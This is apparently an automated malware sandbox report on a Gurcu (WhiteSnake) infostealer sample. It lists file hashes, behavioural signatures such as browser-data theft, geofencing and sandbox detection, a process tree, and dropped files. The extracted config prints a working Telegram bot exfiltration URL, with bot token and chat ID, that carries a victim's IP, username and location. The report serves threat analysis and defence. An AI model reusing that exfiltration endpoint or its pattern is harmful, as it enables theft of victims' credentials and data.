Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
96s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
08/12/2024, 08:13
General
-
Target
55f67b598ae5d8956ea16deefdc771c7.exe
-
Size
5.6MB
-
MD5
55f67b598ae5d8956ea16deefdc771c7
-
SHA1
2007aed44e368258d70bb124ad12e08a0e8ee1ae
-
SHA256
9dc28d9009e1d6a240030460e6c4e27e2014842cd3e7ab0349d31dd13b5fdfb8
-
SHA512
ad07651cab030fcd72169e6f64bf3a4dc3871c5f66f66607d9b056f4bdb9fe3916f0672833b8a289f5a7f6d642828f24e31e6520b5a7294a251661a5ff542b93
-
SSDEEP
98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:adOuK6mn9NzgMoYkSIvUcwti7TQlvciE
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8081835502:AAFtGgtMdAzFeWYBpQcGx83fjDR_25zfjK0/sendDocument?chat_id=7538374929&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\55f67b598ae5d8956ea16deefdc771c7.exe"C:\Users\Admin\AppData\Local\Temp\55f67b598ae5d8956ea16deefdc771c7.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpED3E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpED3E.tmp.bat2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
200B
MD52b5942934075d04697857aedbd257a22
SHA1a00557c4a5a31a37fa8a30ce06a1eac20fbb7516
SHA2563c8b82a821406d2223344c08712cca153f19157bb208293a4dd7f07c653c3598
SHA5126e1528aae8ef9e684f7aca7f938d49454e5d1f60ea863fc2a0403364e6e90fc48a4ac010a4794939098e77a28ca00aceb8de131944c06065d5b3ba85ce9e52b8
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
712KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
120KB
-
Filesize
424KB
-
Filesize
8KB
-
Filesize
320KB
-
Filesize
472KB
-
Filesize
232KB
-
Filesize
152KB
-
Filesize
3.2MB
-
Filesize
72KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
40KB
-
Filesize
5.6MB